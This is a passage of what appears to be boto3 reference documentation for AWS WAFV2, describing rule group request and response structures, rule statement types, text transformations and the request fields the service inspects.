'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
'LockToken': 'string'
}
Response Structure
(dict) --
RuleGroup (dict) --
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Capacity (integer) --
The web ACL capacity units (WCUs) required for this rule group.
When you create your own rule group, you define this, and you cannot change it after creation. When you add or modify the rules in a rule group, AWS WAF enforces this limit. You can check the capacity for a set of rules using CheckCapacity .
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
Rules (list) --
The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --
The name of the rule. You can\'t change the name of a Rule after you create it.
Priority (integer) --
If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.
Statement (dict) --
The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --
A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.
SearchString (bytes) --
A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you\'re using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you\'re using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
PositionalConstraint (string) --
The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn\'t matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
SqliMatchStatement (dict) --
Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
XssMatchStatement (dict) --
A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
SizeConstraintStatement (dict) --
A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --
The operator to use to compare the request part to the size setting.
Size (integer) --
The size, in byte, to compare to the request part, after any transformations.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
GeoMatchStatement (dict) --
A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --
An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
RuleGroupReferenceStatement (dict) --
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
IPSetReferenceStatement (dict) --
A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the IPSet that this statement references.
RegexPatternSetReferenceStatement (dict) --
A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
RateBasedStatement (dict) --
A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specified the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
Limit (integer) --
The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --
Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --
An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
AndStatement (dict) --
A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --
The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --
A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --
The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --
A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --
The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
